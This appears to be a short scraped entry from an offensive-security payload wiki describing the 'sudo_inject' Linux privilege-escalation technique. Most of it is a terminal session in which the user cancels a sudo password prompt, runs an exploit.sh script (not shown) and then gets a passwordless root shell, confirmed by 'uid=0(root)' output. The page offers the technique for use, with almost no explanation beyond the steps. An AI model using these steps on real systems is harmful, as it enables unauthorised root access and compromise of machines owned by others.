sudo_inject
Technique from PayloadAllTheThings
Last updated
Technique from PayloadAllTheThings
Last updated
Using $ sudo whatever [sudo] password for user: # Press <ctrl>+c since you don't have the password. # This creates an invalid sudo tokens. $ sh exploit.sh .... wait 1 seconds $ sudo -i # no password required :) # id uid=0(root) gid=0(root) groups=0(root)
Slides of the presentation :